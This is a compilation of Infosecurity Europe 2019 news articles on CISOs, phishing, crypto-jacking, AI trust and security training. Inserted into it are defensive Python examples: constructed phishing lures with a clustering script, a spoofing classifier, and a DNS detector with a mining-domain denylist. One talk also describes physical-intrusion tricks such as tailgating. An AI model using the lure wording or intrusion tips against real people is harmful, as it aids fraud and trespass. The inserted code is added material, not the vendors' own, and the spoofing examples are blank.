“This means that any vulnerability will be found and exploited in the future,” he warned. “This is why your job is so critical. The closer technology gets to people’s lives, the more it matters to them that it’s secure.”

#Infosec19: CISOs Should Remember to KISS in Board Meetings

Selling security to the board is all about effective product marketing, and as such requires a deep understanding of the product and audience, and a simple, well-delivered message, according to a leading CISO.

Speaking at Infosecurity Europe, William Hill security chief Killian Faughnan argued that keeping things simple is one of the most important things CISOs can do to sell their vision to the board room.

“Data has its place. But that place is mainly in your dashboard. Your job is to crunch that data down to something meaningful,” he told attendees.

“You should always be aiming for just one slide. I never do more than three. If I try to land more than three messages I confuse myself and them, and the audience will just tune out.”

Knowing what kind of message will work depends on reading the customer (the board) not as a homogeneous whole but as a body of individual members with different views and priorities. That requires the CISO to “know what will delight one and frustrate another” and then work out the best approach to maximize impact for all.

“It’s a very soft skill but one of the most important,” Faughnan added.

The art of selling a message, or ‘product,’ to the board, is heavily dependent on the skill of the person delivering that message: the CISO.

“If you confuse them, they’ll look to buy the ‘product’ from someone else, which unfortunately means [in this context] they’ll hire someone else,” he said. “You’re part of the product as much as everything else, so how you present is important. If you’re more engaged, they’ll enjoy it and feel positive about you and your product.”

Part of this skill in delivering a compelling message requires CISOs not to focus too heavily on the negatives, but rather to argue that “the company is doing well but could do better” — before explaining in simple terms how to achieve that, he said.

The focus throughout should be on “stickiness” — what makes a message stick. It’s a concept also crucial to driving success in employee training and awareness programs, Faughnan argued.

#Infosec19 Enable Visibility into App Development for Vulnerability Management

Visibility is key to effective vulnerability management, but do not rely too much on automated solutions to solve your problems.

Speaking at Infosecurity Europe, Edgescan CEO Eoin Keary talked about “moving the cybersecurity dial” when it comes to vulnerabilities and patching. Referring to statistics that Edgescan released earlier this year, he said that 20% of the issues they see are related to the SMB protocol; even after SMB was exploited by the NotPetya ransomware in 2017, Keary said “we are still finding that”, although not everyone is vulnerable to NotPetya.

He also said that Edgescan is still finding issues with SSL, “which is broken from an implementation perspective,” which is why users should move to TLS sooner rather than later; legacy systems where SSL problems are not being fixed are a common finding.

Looking at the Bluekeep vulnerability, Keary said that when a patch is issued for Windows XP “you probably want to get worried.”

In terms of how to “move the dial” and improve things, Keary pointed to three main areas. The first was visibility, especially of ports and servers and of what you are not patching, as well as visibility of live hosts and APIs. “Get an idea of your attack surface based on vulnerabilities,” get a base understanding of your infrastructure, and understand your risk posture at any point in time.

“Visibility is about alerting what matters to you and what is deployed, it is also about a bill of materials and remuneration for tech stack and web apps,” he said.

The second point was around patching: while businesses are good at doing this for the operating system, they are not so good with Struts or servers, so it is worth considering automated patch management and tools such as Inspec and GitLab.

The third point was around secure application development, for which Keary’s advice was to “build as securely as you can.” Rather than only “shifting left,” he recommended pushing in both directions, because if a system is static and you are not “pumping code in,” it can become vulnerable over time. “Pushing left doesn’t fix this, you need to push right too,” he said.

He also recommended not relying too much on automation, “using augmentation of humans and technology where you can” but “don’t use automation at the cost of accuracy”. Keary concluded by saying: “Don’t sweat the zero days, the majority of vulnerabilities are old and most zero days are from 2015.”

#Infosec19: Winners of European Security Blogger Awards Announced

The results of the 2019 European Security Blogger Awards have been announced.

Held at an event organized by Eskenzi PR and sponsored by Synopsys, this year saw new awards announced recognizing new blogs and podcasts, as well as newer social media platforms. The winners were as follows:

The n00bs – Best new cybersecurity podcast – Darknet Diaries

The n00bs – Best new/up and coming blog – The Many Hats Club

The Corporates – The Best CyberSecurity Vendor Blog – MalwareBytes

The Corporates – The Best Commercial Twitter Account – NCSC

The Best CyberSecurity Podcast – Smashing Security

The Best CyberSecurity Video or CyberSecurity Video Blog – Jenny Radcliffe

The Best Personal (non-commercial) Security Blog – Chrissy Morgan

The Most Educational Blog for user awareness – NCSC

The Most Entertaining Blog – Javvad Malik

The Best Technical Blog – DoublePulsar by Kevin Beaumont

The Best Tweeter – QuentynBlog

The Best Instagrammer – Lausecurity

The Legends of Cybersecurity – Grand Prix for Best Overall Security Blog – Graham Cluley

Ex-NSA Hacker Reviewed by FEC over Software Contribution Offer

Following the controversy surrounding the hacking of the 2016 U.S. presidential election, an ex-NSA hacker wants to give political campaigns a free tool to block hackers from getting access to their files.

Oren Falkowitz, who is also the founder of Area 1, wants to offer the company's software to help protect political campaigns from spear phishing, the technique Russian military hackers used to gain illegal access to the email accounts of the Democratic National Committee and to the emails of Hillary Clinton's campaign chairman in 2016. Speaking to NBC News, Falkowitz commented that campaigns can't afford to spend contribution money on expensive cybersecurity products: "This is exactly the thing we are supposed to be trying to solve against."

However, the Federal Election Commission (FEC) issued a draft notice on Monday, June 4, 2019, recommending that the commission vote against Area 1 Security's request to offer cybersecurity software for free to the 2020 presidential campaigns. The reasoning is that a company providing a free product to a political campaign can count as a corporate campaign contribution.

Yet Area 1 cites as precedent Microsoft Corp.'s offer last year of "a package of enhanced online account security services to its election-sensitive customers at no additional cost." An exception was made for Microsoft because it would be acting on a "nonpartisan basis."

"Microsoft plans to offer this service for a variety of commercial reasons beyond mere promotion or goodwill, most notably to protect its brand reputation, which would be at risk of severe and long-term damage if the accounts of its election sensitive customers were hacked," the commission ruled in October 2018. On this occasion, though, the FEC found that Area 1 did not meet the same criteria. 

The FBI says political campaigns remain "a top target for foreign influence campaigns," including through hacking. "We recognize that our adversaries are going to keep adapting and upping their game," said FBI director Christopher Wray. "So we are very much viewing 2018 as just kind of a dress rehearsal for the big show in 2020."

The FEC is slated to officially decide on Area 1's request during a public meeting Thursday.

After two years of investigating, Robert S. Mueller III released his Report on the Investigation into Russian Interference in the 2016 Presidential Election. It found that Russian actors interfered in the 2016 presidential election through social media activity (which links back to the Cambridge Analytica exposé of March 2018) and that "a Russian intelligence service conducted computer-intrusion operations against entities, employees, and volunteers working on the Clinton Campaign and then released stolen documents."

Imperva Acquires Bot Management Company Distil Networks

Distil Networks will be acquired by cybersecurity company Imperva, reinforcing its market leadership in the application security market. 

"Distil Networks is a globally recognized leader in automated attack mitigation, and this deal perfectly aligns with our vision of delivering best-in-class cybersecurity solutions that protect businesses throughout their cloud journey,” says Chris Hylen, CEO of Imperva. The company will integrate Distil Networks’ solution into its security stack to deliver complete protection for applications and APIs, wherever they reside.

Bot management protects companies from automated threats such as fake accounts, credit card fraud, account takeover, digital advertising fraud and spam bots. According to Distil Networks' Bad Bot Report 2019, bots were used to exploit social media platforms in an attempt to influence political dialogue and elections, as with the 2016 U.S. presidential election. Other industries find themselves victims of bots, including:

  • Airlines suffer from online travel agents, aggregators and competitors using bots to scrape content such as flight information, pricing and seat availability, while criminals attempt to fraudulently access user accounts that contain loyalty program awards and credit card information.
  • Competitors use bots to aggressively scrape pricing and inventory information, with criminals using them to commit fraud by stealing gift card balances and to access user accounts and credit card information from e-commerce sites.
  • Brokers, scalpers, hospitality agencies and corporations use bad bots to check for event ticket availability and to purchase available seats to resell on secondary markets.

The report also found that stolen credentials from data breaches are creating a worsening bot problem for any online business having a login page. Criminals use bots to test the "viability of stolen credentials." The research showed that every new data breach sees an increased availability of credentials and leads to higher volumes of bad bot traffic, with over 14 billion credentials stolen since 2013. 

“Bots are an evolving attack vector that has become a threat to all organizations, no matter the size or location,” explained Tiffany Olson Kleemann, CEO of Distil Networks. “We have been leading the charge to find solutions to better understand, detect and mitigate automated attacks since 2011. Today’s announcement serves as a testament to the ingenuity and dedication of Distil Networks’ team over the past eight years to solve this problem for our customers. We are excited to enter into a new chapter with a company that shares our passion for protecting critical business applications and delivering best-in-class security solutions for all customers.”

“Distil Networks gives us a comprehensive Bot Management solution that identifies, responds to and manages a full range of automated attacks no matter where these applications or APIs are deployed," said Hylen. "We believe Imperva and Distil Networks will create the most comprehensive security platform on the market and we’re excited to make this available to our customers worldwide.”

Nearly Half of Phishing Attacks Are Polymorphic

Nearly one in two phishing attacks are polymorphic, according to research by IRONSCALES. The self-proclaimed world's first automated phishing prevention, detection and response platform identified 11,733 email phishing attacks that underwent at least one permutation over 12 months, with 52,825 permutations impacting 209,807 inboxes across the world.    

Polymorphism occurs when an attacker implements slight but significant and often random changes to an email, such as its content, copy, subject line, sender name or template, in conjunction with or after an initial attack has deployed. This approach means that attackers can quickly develop phishing attacks that trick signature-based email security tools that were not built to recognize such modifications to threats, ultimately allowing different versions of the same attack to land undetected in employee inboxes. 

This brings extra complexity for security teams trying to defend against polymorphic phishing attacks. According to IRONSCALES, these attacks remain one of the "most time-consuming and burdensome tasks," especially as phishing kits can be inexpensive on the dark web. Currently, decentralized and distributed intelligence, coupled with non-signature-based email security tools that use artificial intelligence and machine learning to cluster similar attacks together, has proven most successful at mitigating polymorphic email phishing threats.
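As an added illustration (not IRONSCALES' code), the constructed sample below shows why an exact signature misses every permutation of a lure while similarity clustering over normalized body text still groups them; the messages, the 2-token shingling and the 0.5 threshold are assumptions for this example.

```python
"""Added example (not IRONSCALES' code): exact signatures versus similarity
clustering for polymorphic phishing.  All messages are constructed samples."""
import hashlib
import re
from itertools import combinations

BASE_BODY = ("Your mailbox storage is almost full. To avoid losing messages, verify "
             "your account within 24 hours at https://example-login.invalid/verify. "
             "Thank you, IT Support")

# Constructed sample: one lure (m1), three permutations of it, one benign mail.
MESSAGES = [
    {"id": "m1", "sender": "IT Support", "subject": "Mailbox almost full",
     "body": BASE_BODY},
    # m2: only the cheapest fields (sender name, subject) were changed.
    {"id": "m2", "sender": "Helpdesk", "subject": "Action required: storage quota",
     "body": BASE_BODY},
    # m3: copy edits, a new deadline and a rotated link.
    {"id": "m3", "sender": "IT Helpdesk", "subject": "Storage quota exceeded",
     "body": "Your mailbox storage is almost full. To avoid losing emails, please "
             "verify your account within 48 hours at https://mail-verify.invalid/x. "
             "Thank you, IT Helpdesk"},
    # m4: a prefix added to the template plus another rotated link.
    {"id": "m4", "sender": "IT Support", "subject": "Final notice",
     "body": "Final notice: your mailbox storage is almost full. To avoid losing "
             "messages, verify your account within 24 hours at "
             "https://acct-check.invalid/login. Thank you, IT Support"},
    {"id": "m5", "sender": "Dana", "subject": "Quarterly report",
     "body": "Hi team, the quarterly report is attached. Please review before "
             "Friday's meeting. Thanks, Dana"},
]


def signature(msg):
    """Exact-match signature of the kind a signature-based gateway stores."""
    raw = msg["sender"] + "\n" + msg["subject"] + "\n" + msg["body"]
    return hashlib.sha256(raw.encode()).hexdigest()


def tokens(text):
    """Normalize the fields attackers rotate most: links, numbers and case."""
    text = text.lower()
    text = re.sub(r"https?://\S+", "<url>", text)
    text = re.sub(r"\d+", "<num>", text)
    return re.findall(r"[a-z<>]+", text)


def shingles(msg, k=2):
    """Set of k-token shingles of the body (subject and sender are too cheap to mutate)."""
    toks = tokens(msg["body"])
    return {" ".join(toks[i:i + k]) for i in range(len(toks) - k + 1)}


def jaccard(a, b):
    return len(a & b) / len(a | b) if (a | b) else 0.0


def cluster(messages, threshold=0.5, k=2):
    """Single-linkage clustering: messages whose shingle overlap reaches the
    threshold share a cluster.  Returns sorted lists of message ids."""
    parent = {m["id"]: m["id"] for m in messages}

    def find(x):
        while parent[x] != x:
            parent[x] = parent[parent[x]]
            x = parent[x]
        return x

    sh = {m["id"]: shingles(m, k) for m in messages}
    for a, b in combinations(messages, 2):
        if jaccard(sh[a["id"]], sh[b["id"]]) >= threshold:
            parent[find(a["id"])] = find(b["id"])
    groups = {}
    for m in messages:
        groups.setdefault(find(m["id"]), []).append(m["id"])
    return sorted(sorted(g) for g in groups.values())


if __name__ == "__main__":
    print("distinct signatures:", len({signature(m) for m in MESSAGES}))
    print("clusters:", cluster(MESSAGES))
```

Every permutation gets a new signature, so a gateway that learned m1 still lets m2 through; the clustering view reports one campaign of four messages plus the benign mail on its own.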

“Polymorphic email phishing threats represent an incredibly difficult challenge for SOC and IT security teams to overcome,” said Eyal Benishti, founder and CEO, IRONSCALES. “Just as security personnel think that they may have a phishing threat under control, attackers can augment the artifacts to give the message an entirely new signature, thereby enabling what is for all intents and purposes the same malicious message to bypass the same human and technical controls that might have stopped a previous version of the attack.”

These findings come weeks after the company found that secure email gateways (SEGs) failed to stop 99.5% of all non-trivial email spoofing attacks.

A two-year analysis of more than 100,000 verified email spoofing attacks found that the most common spoofing techniques included sender name impersonations and domain look-alike attacks, bypassing SEG technology on a regular basis.

The most common email spoofing attack techniques to bypass SEGs include:

  • Exact sender name impersonations (73.5%): When an email is sent masquerading as coming from a trusted source, such as a colleague. Example:
  • Similar sender name impersonations (24%): When an email is sent masquerading as coming from a trusted source, such as a colleague, with minor obfuscations. Example:
  • Lookalike/cousin domain spoofing (2%): When an email is sent from a similar domain, in which attackers register the domain to set the right authentication records in the DNS. Example:
  • Exact domain spoofs (0.5%): When an email is sent from a fraudulent domain that exactly matches the spoofed brand’s domain. Example:
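An added classifier (not IRONSCALES' code) that sorts an inbound From: header into the four categories above by comparing it against a trusted-contact directory; the directory, the sample addresses, the difflib similarity threshold, and the assumption that the receiving MTA supplies an SPF/DKIM/DMARC result are all constructed for this illustration.

```python
"""Added example (not IRONSCALES' code): classify an inbound From: header into
the four spoofing categories.  Directory, addresses and threshold are constructed."""
import difflib
from email.utils import parseaddr

# Constructed directory of trusted contacts: display name -> real address.
TRUSTED_CONTACTS = {
    "Alice Example": "alice@example-corp.com",
    "Finance Team": "finance@example-corp.com",
}
TRUSTED_DOMAINS = {addr.rsplit("@", 1)[1] for addr in TRUSTED_CONTACTS.values()}


def _norm(s: str) -> str:
    return " ".join(s.lower().split())


def _similar(a: str, b: str, threshold: float = 0.8) -> bool:
    """Near-match test for look-alike strings (assumed threshold; tune per tenant)."""
    return difflib.SequenceMatcher(None, _norm(a), _norm(b)).ratio() >= threshold


def classify_sender(from_header: str, authenticated: bool) -> str:
    """Return 'ok' or one of the four spoofing categories.

    from_header:   raw From: value, e.g. 'Alice Example <alice@example-corp.com>'
    authenticated: whether SPF/DKIM/DMARC passed for the From domain (assumed to be
                   supplied by the receiving MTA).  A registered look-alike domain
                   passes authentication, which is why that case needs a string check.
    """
    name, addr = parseaddr(from_header)
    addr = addr.lower()
    domain = addr.rsplit("@", 1)[1] if "@" in addr else ""
    known_names = {_norm(n) for n in TRUSTED_CONTACTS}

    # 1. Our own domain in From: but the message did not authenticate.
    if domain in TRUSTED_DOMAINS:
        return "ok" if authenticated else "exact_domain_spoof"

    # 2. Cousin domain: authentication passes, the name is one edit away from ours.
    if any(_similar(domain, td) for td in TRUSTED_DOMAINS):
        return "lookalike_domain"

    # 3. Display name copied exactly from a trusted contact, foreign address.
    if _norm(name) in known_names:
        return "exact_name_impersonation"

    # 4. Display name with minor obfuscations (digit-for-letter swaps and the like).
    if name and any(_similar(name, n) for n in known_names):
        return "similar_name_impersonation"

    return "ok"


if __name__ == "__main__":
    for hdr, auth in [("Alice Example <alice@example-corp.com>", False),
                      ("Alice Example <alice.example@webmail.invalid>", True),
                      ("AIice Examp1e <a.example@webmail.invalid>", True),
                      ("Alice Example <alice@example-c0rp.com>", True)]:
        print(f"{hdr!r}: {classify_sender(hdr, auth)}")
```

The ordering matters: the exact-domain check relies on authentication, while the other three categories are invisible to SPF/DKIM and need the directory comparison.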

#Infosec19: How to Defend Against ‘Multi-Intent’ Malware

Speaking at Infosecurity Europe 2019, Iko Azoulay, founder and CTO of Empow, discussed ‘multi-intent malware’ – which he described as malware designed to have multiple attack impacts and methods that do more than just infect a system for a single goal.

He referred to diversification as an effective development strategy for any business, and explained that cyber-attackers are now turning to diversification in their malware attacks to cause maximum, proliferated impact.

That has made classification of malware attacks a far harder task for organizations, Azoulay added, and so newer strategies must be implemented to establish the intent of modern malware.

He therefore pointed to four key pillars for protecting against multi-intent malware attacks.

The first is auto-classifying all possible intents of malware, and Azoulay suggested a “technology versus technology,” or “machine versus machine,” approach can be effective.

The second is the use of behavioral-based protection tools, and the third is adding context to alerts as “different contexts may result in different intents and ultimately different protections.”

The fourth pillar of multi-intent malware defense is “acting according to business logic.”

To conclude, Azoulay reiterated the importance of systems that can automate malware and attacker classification to detect, prioritize and remediate both known and unknown threats.

#Infosec19: Threat Intel Sharing: The Future of Resilience, but Use with Caution

Speaking at Infosecurity Europe 2019, Chris Doman, security researcher at AT&T Cybersecurity, explored the sharing of threat intelligence data and highlighted how it can be used to improve security and resilience, but also warned that care must be taken to ensure that the right kind of data is shared.

He said that successful threat intelligence sharing comes down to being able to trust shared data, and it’s about the “quality of the data being shared, and not the quantity.”

For example, he added, there is a lot of “quick Tweeting” of attacks on Twitter, but much of the threat information shared there is wrong, and that can be dangerous, Doman explained.

In terms of future trends that will drive threat intel sharing going forward, Doman listed the following:

  • Automated pivoting and enrichments of IOCs
  • Automated threat sharing
  • Encrypted network traffic – JA3(S)
  • Sigma and OSQuery Rules

To conclude, Doman stated that the industry should do more to share threat detection intel, but warned that it should be wary of oversharing threat tracking methods. He also highlighted the importance of being able to “trust your sharing partners” and so verification of shared data is key. Finally, he pointed to automation as being a pivotal technology in the evolution of threat intelligence sharing, but admitted that manual verification will always remain important.

#Infosec19: DNS Security Could Be a Match for Crypto-jacking

DNS security tools can offer IT teams a useful way to detect and prevent illegal cryptocurrency mining on their networks, according to Infoblox.

The security vendor’s consulting solutions architect, Chris Marrison, told attendees at Infosecurity Europe today that rapid technology advances over the past couple of years have taken the industry from the digital equivalent of panning for gold to pit mining in a very short space of time.

“However, the cheapest way to access computing power with the best RoI is not to pay for cooling, power or CPUs at all,” he added.

So-called crypto-jacking has emerged as a favorite way for hackers to make money, by handing off the power- and CPU-intensive task of mining for digital currency to infected hosts.

According to Trend Micro, detections peaked last year at over 1.3 million — a 237% increase from 2017.

Although the end of the notorious mining tool Coinhive earlier this year seems to have led to a decline in attacks targeting consumers, they’re still on the rise against enterprises.

Crypto-jacking enabled by malware infections is more serious for organizations than in-browser attacks, warned Marrison.

“Using your PC without your consent is one thing, but infections with malware means you’re compromised. In future, this machine is effectively a zombie which could be used for additional malicious activity,” he claimed.

Crypto-mining malware activity can be hard to spot as there’s no attempt to steal data; infections can be spread out across desktops, servers, mobile devices and IoT endpoints; and traffic is difficult to differentiate from legitimate traffic.

However, DNS offers an opportunity to shine a light on such threats, according to Marrison.

By monitoring this channel with specialized tools, organizations can spot attempts by hosts to connect to known crypto-mining malware distribution sites, and detect communications between infected clients and C&C domains, he argued.

DNS tools can also be used to spot fast flux and DGA techniques which rapidly change the C&C’s IP address in a bid to avoid detection. These capabilities should be built into a defense-in-depth approach to cybersecurity including best practice controls such as AV, firewalls and more, Marrison concluded.
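As an added example (not Infoblox's code) of the three DNS-side signals just described, the function below runs over a constructed resolver log and flags clients that resolve a known mining domain, query names that look machine-generated, and domains whose low-TTL answers rotate across many addresses; the log lines, the denylist and the thresholds are all assumptions for this illustration.

```python
"""Added example (not Infoblox's code): DNS-log triage for crypto-jacking
indicators.  Log, denylist and thresholds are constructed for illustration."""
import math
from collections import defaultdict

# Constructed denylist of mining-pool / dropper domains (placeholder names).
KNOWN_MINING_DOMAINS = {"pool.miner-example.invalid", "cdn.cryptoloader.invalid"}

# Constructed resolver log, one query per line: ts client qtype qname answer ttl
DNS_LOG = """\
2019-06-04T09:00:01Z 10.0.0.5  A pool.miner-example.invalid 203.0.113.10 3600
2019-06-04T09:00:02Z 10.0.0.7  A www.example.org 198.51.100.4 3600
2019-06-04T09:00:05Z 10.0.0.9  A ajdk3r8zqpx2vnslwy.invalid 192.0.2.1 300
2019-06-04T09:00:06Z 10.0.0.9  A kq9xzv3rtbnmw7sldp.invalid 192.0.2.2 300
2019-06-04T09:01:00Z 10.0.0.12 A cc-front.invalid 203.0.113.21 60
2019-06-04T09:02:00Z 10.0.0.12 A cc-front.invalid 203.0.113.22 60
2019-06-04T09:03:00Z 10.0.0.12 A cc-front.invalid 203.0.113.23 60
2019-06-04T09:04:00Z 10.0.0.12 A cc-front.invalid 203.0.113.24 60
2019-06-04T09:05:00Z 10.0.0.12 A cc-front.invalid 203.0.113.25 60
2019-06-04T09:05:30Z 10.0.0.7  A mail.example.org 198.51.100.5 3600
"""


def parse(log_text):
    records = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, client, qtype, qname, answer, ttl = line.split()
        records.append({"ts": ts, "client": client, "qtype": qtype,
                        "qname": qname.lower().rstrip("."), "answer": answer,
                        "ttl": int(ttl)})
    return records


def entropy(s):
    """Shannon entropy in bits per character."""
    if not s:
        return 0.0
    n = len(s)
    return -sum((s.count(c) / n) * math.log2(s.count(c) / n) for c in set(s))


def looks_generated(qname, min_len=12, min_entropy=3.5, max_vowel_ratio=0.3):
    """Heuristic DGA test on the leftmost label: long, high-entropy, vowel-poor.
    Expect false positives from CDN and cloud hostnames; treat as a triage signal."""
    label = qname.split(".")[0]
    if len(label) < min_len:
        return False
    vowels = sum(label.count(v) for v in "aeiou")
    return entropy(label) >= min_entropy and vowels / len(label) < max_vowel_ratio


def fast_flux_domains(records, max_ttl=300, min_ips=5):
    """Domains whose low-TTL A answers rotated across many distinct addresses."""
    seen = defaultdict(set)
    for r in records:
        if r["qtype"] == "A" and r["ttl"] <= max_ttl:
            seen[r["qname"]].add(r["answer"])
    return {d for d, ips in seen.items() if len(ips) >= min_ips}


def detect(log_text):
    """Return sorted (client, domain, reason) findings; one per distinct triple."""
    records = parse(log_text)
    flux = fast_flux_domains(records)
    findings = set()
    for r in records:
        if r["qname"] in KNOWN_MINING_DOMAINS:
            findings.add((r["client"], r["qname"], "known mining domain"))
        elif looks_generated(r["qname"]):
            findings.add((r["client"], r["qname"], "possible DGA C&C"))
        elif r["qname"] in flux:
            findings.add((r["client"], r["qname"], "fast-flux resolution"))
    return sorted(findings)


if __name__ == "__main__":
    for client, domain, reason in detect(DNS_LOG):
        print(f"{client:<10} {domain:<30} {reason}")
```

The denylist catches the distribution-site case directly; the entropy and rotation checks are what surface a C&C channel the denylist has never seen, at the cost of some manual review of the hits.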

#Infosec19: Data Challenges Mean AI Systems Can’t Be Trusted

Organizations will never be able to trust artificial intelligence (AI) for cybersecurity decision-making until they can fix data bias and inaccuracies, and challenges around transparency and validation, according to a leading expert.

Speaking at Infosecurity Europe today, Titania chief strategy officer, Nicola Whiting, argued that bad data will always lead to poor decision making in machine learning systems.

This has been seen in the past with Microsoft’s ill-fated Tay AI system, whose Twitter account began spouting racist, sexist and neo-Nazi epithets after “learning” from other social media users.

It can also be witnessed in Amazon’s aborted attempt to use AI in recruitment. A four-year project was shelved last year after managers discovered that it had been learning from biased data favoring male candidates.

This becomes a major problem when such systems are used in sensitive areas like criminal justice. Questions have been raised in both the US and UK about systems trained on historical data, which then build in the same conscious and unconscious human biases over matters of race.

Thousands of leading AI and robotics experts have also signaled their opposition to attempts to develop autonomous weapons systems.

“If the experts are saying AI is not good enough yet when lives are on the line, how can it be good enough to make decisions on our networks?” argued Whiting.

Part of the problem also lies with the type of data AI systems are being fed, she added.

When used in SIEM systems, AI is typically working with probabilistic data which extrapolates info from how devices respond to attacks or queries and “makes an educated guess” about risk. Using AI in this context effectively layers a “guess on top of a guess,” Whiting warned.

To support effective SOAR (Security Orchestration, Automation and Response) systems, AI instead needs to be fed deterministic data, where risks are determined from well-defined parameters such as device configurations, she explained.

It can then be harnessed to drive systems that are both self-defending and adaptive, and self-healing, meaning they’ll reconfigure themselves according to best practices and standards.

This will take a lot of pressure off stretched IT security teams, enabling them to focus more fully on reviewing probabilistic data, and drive better decision-making overall, Whiting claimed.

The path towards trustworthy, effective AI lies not only with better understanding bias and focusing on deterministic data and decision-making, but also in being able to validate decision processes and data types/integrity.

Current proprietary systems make that nearly impossible. Trusting such systems is akin to sending your child to university without knowing what course they’re studying or whether the professor is even qualified, Whiting argued.

“The problem with our trust in AI is that we can’t always trust the data is accurate and unbiased; we can’t always access how it thinks; and we can’t validate it either,” she concluded. “Unless we can fix this, I don’t think we’ll ever be able to trust AI.”

#Infosec19: Experts Urge Defense-in-Depth Approach to Security Training

IT leaders must expand cybersecurity training programs beyond phishing awareness to avoid major blind spots emerging which could lead to security breaches, according to industry experts.

Speaking at an Infosecurity Europe panel debate today, former Bank of Ireland CISO, Flavius Plesu, claimed that phishing accounts for only around 5% of data breaches and leaks. But even if training is largely effective, it only needs one email to get through to let the attackers in — something likely to happen 99.9% of the time if they use sophisticated targeted techniques, he added.

“The industry is excited about phishing awareness because for the first time ever we can measure the impact of training,” argued Plesu, who is now CEO of security start-up OutThink.

“But an exclusive focus on phishing could leave a lot of blind spots and will surprise [the organization] in a negative way.”

HSBC’s Europe and UK CISO, Paula Kershaw, largely agreed, claiming phishing awareness exercises are “an important tool in the box, but not the only tool.”

“It’s very important to do as an organization, but running a phishing awareness campaign alone doesn’t protect you,” she added.

Security training could also include elements such as: password management; safe internet usage, data handling and downloads; and compliance requirements, for example.

Staff training should be combined with sandboxing, threat intelligence and other security controls for true defense-in-depth, argued Kershaw.

Misunderstandings about the importance of phishing awareness are part of a wider problem with staff cybersecurity training in that much of it is based on pseudo-science and is therefore unmeasured, added Plesu.

“I’ve learned to hate security awareness training because of the false assumptions and false promises,” he argued. “The false assumption is that pushing more knowledge into the organization will result in more effective risk mitigation.”

Especially in large, complex organizations, it’s vital to measure the core components of any program in real-time and at scale, he said. These include: security awareness; the intention of individuals to comply; the self-efficacy of programs, that is, whether advice can be practically implemented; and cost and productivity impact.

#Infosec19: Shake Up Cybersecurity Training to Keep Ahead of Hackers

Cybersecurity training needs to evolve to allow organizations to keep up with today’s sophisticated threat actors, according to Max Vetter, CCO at Immersive Labs.

Vetter was talking at the Infosecurity Europe 2019 event at Kensington Olympia, London today (June 4). During the session, Vetter highlighted the need for innovation in order to match the tools and techniques used by cyber-criminals.

“Attackers’ ability to innovate means they have first mover advantage. If the criminals didn’t innovate, we would have already won,” he told the audience at the conference’s Strategy Talks theatre.

It is creating a need to cultivate the right skills, according to Vetter: “How can we teach people to make sure they can keep ahead of the hackers, legally, while being able to innovate as well?”

Vetter thinks the only way to cultivate the level of talent needed to keep up with cyber-criminals is a shake-up of the way cybersecurity training is done. He points out that current methods often fail because they are “out of date, expensive and trainer dependent” with a “rigid learning style”.

“Certifications are the only way we can do it at the moment, but this method is not great,” Vetter said.

According to Vetter, businesses often make the error of focusing on Red Teams to test systems’ resilience. However, Blue Teams to defend an organization are just as important, he told the audience.

By shaking up the way security professionals are trained, using the industry-standard MITRE ATT&CK framework, Vetter thinks organizations can ensure they are one step ahead of attackers.

Specifically, Vetter advocates intelligence-led training to give young hackers the skills to do their job. He advocates being “hands-on, flexible and outcome focused” and to “measure skills and success”.

“We are losing,” says Vetter. “We need to do better at developing people with these skills rather than sending them to jail.”

#Infosec19: Physical Intrusions Too Often Go Unchallenged

Security awareness techniques rarely work, as too few employees spot or report intrusions.

Speaking at the opening of the Geek Street stage at Infosecurity Europe 2019, Holly Grace, technical director at Secarma, said that too much security awareness training is taught from a negative approach, and this doesn’t work.

Pointing to the common “tailgating” technique, Grace said that when doing a physical security test she had rarely been challenged as a tailgater; in one instance she was able to enter through a door that had been propped open with a bunch of car keys. From there, she was able to reach an empty security desk and see the security guard’s open email and camera screens.

In the case of physical security barriers, Grace said that the alarm on these is often so quiet that no one would notice it sounding. Another way to bypass barriers is to wait for a scheduled fire alarm, as the whole workplace leaves together and barriers are either bypassed or opened.

Turning to the “bystander effect,” Grace pointed to academic research on how people react in emergency and non-emergency situations. “In a group, 10% will do something about it; if they are on their own they are more likely to do something,” she said. “A stranger is less likely to react if they are surrounded by other people.”

Grace added that staff will not challenge strangers, and strangers “infrequently get challenged.” She said that in a test she will often go with another tester, and when she is challenged, the other person acts as a “plan B.”

“Also, you are less likely to be challenged with two people,” she said. “If staff do not have the courage to challenge them for ID, is there a way to report it? This is a problem with bystander effect.”

In closing, Grace also mentioned problems with phishing emails and bad password practice. For the former, she said that all too often people are caught out by phishing emails with simple spelling mistakes, and there is no way for employees to spot and report malicious attachments.

For passwords, Grace recommended using multi-factor authentication or password managers, but asked how many businesses actually provide a password manager for staff to use.

Concluding, Grace said that there is a disconnect between what pen testers and cyber-criminals can do, and what staff can report, and “diffused responsibility lowers the chance of a challenge.”

LORCA Announces Additions to Cybersecurity Program

The London Office for Rapid Cybersecurity Advancement (LORCA) today announced the third round of cybersecurity companies that will be joining its program to address the market needs of industry. The 15 "scaleups" responded to an open call and were invited to pitch their solutions to address the focus areas identified by the association: security by design, basics and beyond.

According to LORCA, this round of companies is the most "international yet," with companies from Italy, Spain and South Korea entering the program. Margot James, Minister for Digital, said, “Ahead of London Tech Week, it’s great to see that LORCA is now welcoming international companies to the capital, making this a truly global effort to ensure we have a Britain that’s fit for the future.”

The 15 companies will take part in a bespoke program designed around each of their needs, which will be delivered by Plexal's innovation team, the Centre for Secure Information Technologies (CSIT) at Queen’s University Belfast, and Deloitte’s cyber team.

Saj Huq, program director of LORCA, commented on the announcement: “We’re delighted with the caliber of the new additions to our program, with the latest cohort representing a host of new and exciting cyber solutions which we’ll be able to scale and help bring to market.

"We’re particularly pleased with the international flavor which the latest group of scaleups brings to LORCA, fortifying our position as a global cyber hub and the UK’s foremost destination for the most advanced technological solutions.”

Companies selected for the program are: 

  1. CounterCraft: Its Cyber Deception Platform detects, investigates and controls targeted attacks to help enterprises understand why cyber-attackers are targeting them and defend their most business-critical assets.
  2. CTO Technologies: The company’s CyberCentral platform enables the public and private sectors to better manage their security risks by automating manual processes – and alleviating the strain on IT teams.
  3. D-RisQ: The company develops and uses automatic, high-integrity software verification tools that are focused on embedded systems and cybersecurity. The tools have been used in a range of sectors, including autonomous vehicles, aerospace and maritime.
  4. Elemendar: Its AI analyst for cyber-threat intelligence (CTI) tells cyber-defense tools what threats to defend against.
  5. Hack The Box: The online platform provides labs and challenges for cybersecurity training, allowing members to exchange ideas and methodologies. 
  6. HumanFirewall: The company gamifies learning through training and phishing simulations, builds individual risk-profiles, rewards real-time reporting and remediates incidents instantly.
